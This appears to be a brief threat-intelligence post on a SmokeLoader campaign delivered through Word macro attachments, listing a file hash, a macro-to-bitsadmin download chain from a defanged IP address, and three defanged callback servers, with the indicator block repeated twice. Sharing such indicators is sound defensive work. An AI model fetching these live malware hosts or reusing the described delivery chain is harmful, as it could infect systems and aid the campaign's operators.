SmokeLoader campaign is active in the wild since past few weeks. It is sent through Word Documents attached to emails.
MD5 hash: e6671e44ed357802439d0b9fbce344bf
Macro -> bitsadmin -> download Binary from URL: hxxp://89.248.169.136/bigmac.jpg
Callback servers:
hxxps://securityupdateserver1.com/blog/wp.php
hxxps://securityupdateserver2.com/blog/wp.php
hxxps://securityupdateserver3.com/blog/wp.php
All details of evasion techniques used by SmokeLoader mentioned here: http://www.pwncode.club/2017/10/evasion ... -wild.html
MD5 hash: e6671e44ed357802439d0b9fbce344bf
Macro -> bitsadmin -> download Binary from URL: hxxp://89.248.169.136/bigmac.jpg
Callback servers:
hxxps://securityupdateserver1.com/blog/wp.php
hxxps://securityupdateserver2.com/blog/wp.php
hxxps://securityupdateserver3.com/blog/wp.php
All details of evasion techniques used by SmokeLoader mentioned here: http://www.pwncode.club/2017/10/evasion ... -wild.html
